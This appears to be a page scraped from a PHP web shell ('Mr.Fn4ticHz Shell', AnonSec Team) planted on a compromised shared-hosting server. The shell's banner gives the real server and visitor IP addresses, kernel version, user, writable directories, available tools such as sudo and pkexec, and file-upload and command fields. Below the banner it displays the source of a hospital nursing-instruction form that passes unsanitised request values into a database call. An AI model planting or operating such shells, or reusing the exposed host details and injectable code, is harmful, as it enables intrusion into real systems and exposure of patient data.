Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.137.212.71
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//Nursing_Instruction_Sheet.php
<?php session_start();
require_once("../patientmanager.php");
require_once("../DBManager.php");
if(isset($_POST['Instruction_Sheet'])) 
{
   PatientManager::InstructionSheet("$_GET[prescriptionid]","$_GET[patientid]","$_GET[surgeryid]","$_POST[foodtake]","$_POST[Anesthesia_Note]","$_POST[entered_by]");
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>

     <script type="text/javascript">
$(document).ready(function(){
    $('#myForm_Instruction_Sheet').submit(function() {
     $('#loaderImg').show(); 
      return true;
    });
});
  </script>
<style>
      #loaderImg {
         position: absolute;
         top: 0;
         bottom: 0;
         left: 0;
         right: 0; 
         margin: auto;
         border: 10px solid grey;
         border-radius: 50%;
         border-top: 10px solid black;
         width: 100px;
         height: 100px;
         animation: spin 1s linear infinite;
      }
      @keyframes spin {
         0% {
            -webkit-transform: rotate(0deg);
            transform: rotate(0deg);
         }
         100% {
            -webkit-transform: rotate(360deg);
            transform: rotate(360deg);
         }
      }
   </style>
    <section class="content-header">
  <body>  
<div style = "display:none;" id = "loaderImg"> <div class="loader"> </div> </div>

        <form  name='Instruction_Sheet' method="post" id="myForm_Instruction_Sheet">
<h2 align="center">Instruction To Nursing Staff </h2>
<br>
<label>Food Intake</label>
<select name="foodtake">
    <option value="None">None</option>
        <option value="Normal">Normal </option>
            <option value="Liquid">Liquid</option>
                <option value="Nil by mouth">Nil by mouth</option>
</select>
     <label>Nursing Instruction  </label>
 <textarea name="Anesthesia_Note" rows="2" cols="140"></textarea>
   
   <input type="submit" value="Submit" name="Instruction_Sheet">
   </form>
   </body>
   </html>

Anon7 - 2022
AnonSec Team